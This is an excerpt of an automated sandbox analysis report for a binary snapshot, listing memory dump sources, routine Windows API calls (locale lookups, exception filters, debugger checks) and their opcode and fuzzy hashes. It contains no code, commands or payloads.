                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CodeInfoLocalePageValid
                                                • String ID: utf8
                                                • API String ID: 790303815-905460609
                                                • Opcode ID: a389c6567da4db7aea4488b6a1b8f316b68db2cc5732aa5d8c8cc45da0cff917
                                                • Instruction ID: bb05c01086b99dda2608cadb61cfe473f0b8c6bdcbc2d7f669a095834c2ffa9f
                                                • Opcode Fuzzy Hash: a389c6567da4db7aea4488b6a1b8f316b68db2cc5732aa5d8c8cc45da0cff917
                                                • Instruction Fuzzy Hash: 5C713931A0021EAAEB25BB75CD42BBB73A8EF45750F104029F745D71A1EB78E941B7E0
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _strrchr
                                                • String ID:
                                                • API String ID: 3213747228-0
                                                • Opcode ID: 40f0e063838af908aa0c23a01ee66fead67f3bdac29e3056e6e3dd52480c6ad0
                                                • Instruction ID: 3c83209d2c6776ef7cbdcb46fb7d79acc5295a345023cf3368331f543b73972b
                                                • Opcode Fuzzy Hash: 40f0e063838af908aa0c23a01ee66fead67f3bdac29e3056e6e3dd52480c6ad0
                                                • Instruction Fuzzy Hash: B5B16972E0424E9FDB158F28C881BFEBBB5EF55310F14416AEA04AB3A1D234DE05D7A1
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00FE792E
                                                • IsDebuggerPresent.KERNEL32 ref: 00FE79FA
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00FE7A13
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00FE7A1D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                • String ID:
                                                • API String ID: 254469556-0
                                                • Opcode ID: c87e21c76e9cc1f20e248c9d7cbcc083946942d101fefd76cd0f50ed8e3d928f
                                                • Instruction ID: 4efeb60457796d057bbbaa3c5e3d2b00d656da3d493da51be67578589886500a
                                                • Opcode Fuzzy Hash: c87e21c76e9cc1f20e248c9d7cbcc083946942d101fefd76cd0f50ed8e3d928f
                                                • Instruction Fuzzy Hash: B7311675D063589BDB21EFA5D9497CDBBB8BF08300F1041EAE40CAB250EB759B859F44
                                                APIs
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FFC4EC
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FFC536
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FFC5FC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                • Opcode ID: 8cfc7b15731de25ed66ca80c2e3605c3d24df688c852e1618146849af4b5bf9b
                                                • Instruction ID: 079b756c0521d4dd7b96b0e17326e0587b873523f57a63ac166f10a07167b75b
                                                • Opcode Fuzzy Hash: 8cfc7b15731de25ed66ca80c2e3605c3d24df688c852e1618146849af4b5bf9b
                                                • Instruction Fuzzy Hash: 9B61957290412F9FDB29DF24CD82B7A77A8EF04310F144179EB09C65A5E778E944EB90
                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00FEDB6B
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00FEDB75
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00FEDB82
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                • Opcode ID: 640b90c94daf0688b37684783d27a628e6f66647dc24c869ee93333563866b6b
                                                • Instruction ID: 6c7882ea03ed6b7522787c23c0fd1de339dc51e515cff49917ae6d588c95b16e
                                                • Opcode Fuzzy Hash: 640b90c94daf0688b37684783d27a628e6f66647dc24c869ee93333563866b6b
                                                • Instruction Fuzzy Hash: 7731C67490125C9BCB21DF65DC89B8DB7B8BF48350F5041DAE41CA7250E7749F859F44
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b78e9bc5a25061f1abca4818c36b3245c47596756df3441acd3b4668cd2eb70a
                                                • Instruction ID: d369a58337703b7f7f3f138feee61193e430cb88f148cf0d18267df63e8205ed
                                                • Opcode Fuzzy Hash: b78e9bc5a25061f1abca4818c36b3245c47596756df3441acd3b4668cd2eb70a
                                                • Instruction Fuzzy Hash: 1FF15171E002199FDF14CFA9C880AADF7B1FF88324F158269E919A7391DB309E01DB94
                                                APIs
                                                • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00FF5727,?,?,00000008,?,?,010015F5,00000000), ref: 00FF5959
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionRaise
                                                • String ID:
                                                • API String ID: 3997070919-0
                                                • Opcode ID: 6394500a0b3f76a1173636dccfbc548f113bb9b96c9cb6e3d09892967f3da53b
                                                • Instruction ID: 537f81569780ec9c8bc2f7c32e4eceff7e04b84b1cf1947b7b611d0868872c20
                                                • Opcode Fuzzy Hash: 6394500a0b3f76a1173636dccfbc548f113bb9b96c9cb6e3d09892967f3da53b
                                                • Instruction Fuzzy Hash: A6B15F32A10A09DFD729CF28C486B647BE0FF05765F258658EA99CF2B1C335E951DB40
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00FE72B2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FeaturePresentProcessor
                                                • String ID:
                                                • API String ID: 2325560087-0
                                                • Opcode ID: bd7901336641eb48039844463e43f34b6da1c4d1293b9ee04676cc310bd82518
                                                • Instruction ID: 367c8038ad60b4629934df304c01506daf3aa8cc43253a1fcca4113bca36d8e7
                                                • Opcode Fuzzy Hash: bd7901336641eb48039844463e43f34b6da1c4d1293b9ee04676cc310bd82518
                                                • Instruction Fuzzy Hash: 66A18DB2D053058FDB29CFA5D4927ADBBF1FB48364F18812AE449E7349C3399942CB60
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9953a806d080350530143e57560c61f677e898d444d1d4dda7c2c6c26640cc97
                                                • Instruction ID: d3c4c2de186241070357cfcae142a590eee1a57b47f8b162888244e27069fe04
                                                • Opcode Fuzzy Hash: 9953a806d080350530143e57560c61f677e898d444d1d4dda7c2c6c26640cc97
                                                • Instruction Fuzzy Hash: F431F77290421DAFCB20EFB9CC89EBBB77DEF84314F144198FA1597254EA74AE409B50
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 0
                                                • API String ID: 0-4108050209
                                                • Opcode ID: 866df0c93b3c416d71d2a2c6273d98909f581a1bdbe93d7e00b55299fc97f577
                                                • Instruction ID: d28de0f6d0a0f56f7549ec699e26623d6ec18bd4c28b15be8dd156d963c06b59
                                                • Opcode Fuzzy Hash: 866df0c93b3c416d71d2a2c6273d98909f581a1bdbe93d7e00b55299fc97f577
                                                • Instruction Fuzzy Hash: CEC1A1709006C58FCB28CF2EC8816BABBB2BF45320F244619F45697691C735AD47EBD1
                                                APIs
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00FFC73F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                • Opcode ID: 1b690ea399da0f15b30117703d61c568114ea39c62cde328d8129c47fe5db3c8
                                                • Instruction ID: a2b31bbcd70f90f9559cb3b43a457b7acf9fd6758826720806a8a05b2f542a08
                                                • Opcode Fuzzy Hash: 1b690ea399da0f15b30117703d61c568114ea39c62cde328d8129c47fe5db3c8
                                                • Instruction Fuzzy Hash: 7321B63390511EABEF28AF25DD41A7A77A8EF05710F10007AFA05D7161EB78ED00AB90
                                                APIs
                                                • EnumSystemLocalesW.KERNEL32(00FFC498,00000001,00000000,?,-00000050,?,00FFCAC9,00000000,?,?,?,00000055,?), ref: 00FFC3E4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EnumLocalesSystem
                                                • String ID:
                                                • API String ID: 2099609381-0
                                                • Opcode ID: 10de9e3bd2714ef8277a258abf0607de991affef6856523abf07f0d97aad6961
                                                • Instruction ID: c250d8a884a658b99c0d2035174db5b0fd78ec474ceeb32411beb021a5e0a2fa
                                                • Opcode Fuzzy Hash: 10de9e3bd2714ef8277a258abf0607de991affef6856523abf07f0d97aad6961
                                                • Instruction Fuzzy Hash: 6F11023A6003095FDB18DF38C9A15BABBA1FF80368B14842CEA8787A50D375A942D780
                                                APIs
                                                • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00FFC6B4,00000000,00000000,?), ref: 00FFC946
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                • Opcode ID: 54425b636756422b999771d5b7d5960141ec27801a6649084fc119ded8f53d47
                                                • Instruction ID: 9316f7991ad24251d3b7e21c5312816f91e75c2b91f4a91ecef1779038b725d9
                                                • Opcode Fuzzy Hash: 54425b636756422b999771d5b7d5960141ec27801a6649084fc119ded8f53d47
                                                • Instruction Fuzzy Hash: 71F0A93390012DBBDB3897658D05BBABB58EF40764F154428EE46A3194DAB4FE41E6D0
                                                APIs
                                                • EnumSystemLocalesW.KERNEL32(00FFC6EB,00000001,?,?,-00000050,?,00FFCA8D,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00FFC457
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EnumLocalesSystem
                                                • String ID:
                                                • API String ID: 2099609381-0
                                                • Opcode ID: dcc1551d4275aa4366aef708b24631cb7efebcf1f1bf4868a71bf13207f55b26
                                                • Instruction ID: 93a7b9564e2c77a38e8a6787b03091525175c914fea6ce2c2c9801a3fdfdd208
                                                • Opcode Fuzzy Hash: dcc1551d4275aa4366aef708b24631cb7efebcf1f1bf4868a71bf13207f55b26
                                                • Instruction Fuzzy Hash: 9EF0283220030C5FC7149F34DC91A76BB90FF80768F04802CFA458B6A0C2719C01E684
                                                APIs
                                                  • Part of subcall function 00FEDDC1: EnterCriticalSection.KERNEL32(?,?,00FF04BC,00000000,0100C190,0000000C,00FF0483,?,?,00FF3495,?,?,00FF50F6,00000001,00000364,00000002), ref: 00FEDDD0
                                                • EnumSystemLocalesW.KERNEL32(00FF5D72,00000001,0100C3A0,0000000C,00FF6127,00000000), ref: 00FF5DB7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalEnterEnumLocalesSectionSystem
                                                • String ID:
                                                • API String ID: 1272433827-0
                                                • Opcode ID: b8da9bbac59c9450107e5c77de1afb273fbb6cd49ca9fcab6e926a3c35b3ed44
                                                • Instruction ID: fd4176ec8cd57db64d5b12e8866d0745dcee4892e2dfd64bc48d8f05967cca26
                                                • Opcode Fuzzy Hash: b8da9bbac59c9450107e5c77de1afb273fbb6cd49ca9fcab6e926a3c35b3ed44
                                                • Instruction Fuzzy Hash: B6F04F72A04304DFD711EF98E842BAD77B0EB44721F10411AF645DB291C77A5940DB81
                                                APIs
                                                • EnumSystemLocalesW.KERNEL32(00FFC280,00000001,?,?,?,00FFCAEB,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00FFC35E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EnumLocalesSystem
                                                • String ID:
                                                • API String ID: 2099609381-0
                                                • Opcode ID: a33df901aa2dd4a96294f26e0d310aa99c918624f93283f69a77f203605d6fd3
                                                • Instruction ID: bd797b4b400cc23cec532cd54ee264600c97ef9383a085654ffe087c05cfccbf
                                                • Opcode Fuzzy Hash: a33df901aa2dd4a96294f26e0d310aa99c918624f93283f69a77f203605d6fd3
                                                • Instruction Fuzzy Hash: 8FF0553670020C57CB159F75CC05A7ABF90FFC1B60F068058EB098B6A0C2369842E7D0
                                                APIs
                                                • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00FF23AE,?,20001004,00000000,00000002,?,?,00FF19B0), ref: 00FF625F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                • Opcode ID: 008611c7ebe7e20e70663a86778916f82dae92d5cf817b94a95b424736a2fa3d
                                                • Instruction ID: f4f4a5ede1ee505f730929aa5fe8320eb11d21d2945134843a31b558ccb2d25b
                                                • Opcode Fuzzy Hash: 008611c7ebe7e20e70663a86778916f82dae92d5cf817b94a95b424736a2fa3d
                                                • Instruction Fuzzy Hash: C0E01A3250022CBBDF236F60DC08AAE7A2AAF44B60F008010FA45A5221CB768D20AB91
                                                APIs
                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00007ABB,00FE6DC9), ref: 00FE7AB4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                • Associated: 00000000.00000002.2309907645.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309944790.0000000001003000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309958164.000000000100D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309985622.000000000105A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2309998517.000000000105B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2310010511.000000000105C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_fe0000_1f13Cs1ogc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID:
                                                • API String ID: 3192549508-0
                                                • Opcode ID: f0e5ba117f06a7127ada7dea6b74f8f6d5ef63b9acaf9ba025a5e0da0095ea61
                                                • Instruction ID: 645f7ced57b083edb81fef9d7a6109fd111dfbaea2cbd6ffcd7177b3b3f1b4ac
                                                • Opcode Fuzzy Hash: f0e5ba117f06a7127ada7dea6b74f8f6d5ef63b9acaf9ba025a5e0da0095ea61
                                                • Instruction Fuzzy Hash:
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2309920832.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
